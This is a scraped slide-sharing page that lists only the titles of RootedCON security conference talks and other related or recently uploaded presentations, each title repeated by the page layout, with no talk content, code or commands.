Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
 
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]
Marisol Salanova - Seguridad informática y cibersexo [RootedCON 2011]
 
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]
Antonio Ramos - La asimetría en el mercado de la seguridad [RootedCON 2011]
 
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]
{RootedPanel] Grupo de Hackers Históricos: Apòstols [RootedCON 2010]
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
 
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...
Alejandro Martín + Chema Alonso - Pulveriza tus publicaciones con Dust [Roote...
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]
 
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]
Rubén Santamarta - SCADA Trojans: Attacking the Grid [Rooted CON 2011]
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Blueliv - Information Tracking with Optos [Rooted CON 2011]
Blueliv - Information Tracking with Optos [Rooted CON 2011]Blueliv - Information Tracking with Optos [Rooted CON 2011]
Blueliv - Information Tracking with Optos [Rooted CON 2011]
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
 
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
 
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...
Jaime Blasco & Pablo Rincón - Lost in translation: WTF is happening inside m...
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]
 
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
 

Similar to Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]

Analysis of web application worms and viruses
Analysis of web application worms and virusesAnalysis of web application worms and viruses
Analysis of web application worms and virusesUltraUploader
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Web Application Security Reloaded for the HTML5 era
Web Application Security Reloaded for the HTML5 eraWeb Application Security Reloaded for the HTML5 era
Web Application Security Reloaded for the HTML5 eraCarlo Bonamico
 
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web Simulator
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web SimulatorOSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web Simulator
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web SimulatorGail Frederick
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
HTML5 Can't Do That
HTML5 Can't Do ThatHTML5 Can't Do That
HTML5 Can't Do ThatNathan Smith
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsBusy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsJAX London
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-mspMike Saunders
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
Building Mobile Websites with Joomla
Building Mobile Websites with JoomlaBuilding Mobile Websites with Joomla
Building Mobile Websites with JoomlaTom Deryckere
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
Shaping a Technology Strategy for Mobile Development
Shaping a Technology Strategy for Mobile DevelopmentShaping a Technology Strategy for Mobile Development
Shaping a Technology Strategy for Mobile Developmentfrog
 

Similar to Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011] (20)

Analysis of web application worms and viruses
Analysis of web application worms and virusesAnalysis of web application worms and viruses
Analysis of web application worms and viruses
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Web Application Security Reloaded for the HTML5 era
Web Application Security Reloaded for the HTML5 eraWeb Application Security Reloaded for the HTML5 era
Web Application Security Reloaded for the HTML5 era
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web Simulator
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web SimulatorOSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web Simulator
OSCON 2012: Design and Debug HTML5 Apps for Devices with RIB and Web Simulator
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
HTML5 Can't Do That
HTML5 Can't Do ThatHTML5 Can't Do That
HTML5 Can't Do That
 
Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsBusy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Building Mobile Websites with Joomla
Building Mobile Websites with JoomlaBuilding Mobile Websites with Joomla
Building Mobile Websites with Joomla
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
Shaping a Technology Strategy for Mobile Development
Shaping a Technology Strategy for Mobile DevelopmentShaping a Technology Strategy for Mobile Development
Shaping a Technology Strategy for Mobile Development
 

More from RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 

Recently uploaded

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesSanjay Willie
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Fact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsFact vs. Fiction: Autodetecting Hallucinations in LLMs
Fact vs. Fiction: Autodetecting Hallucinations in LLMsZilliz
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 

Recently uploaded (20)

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
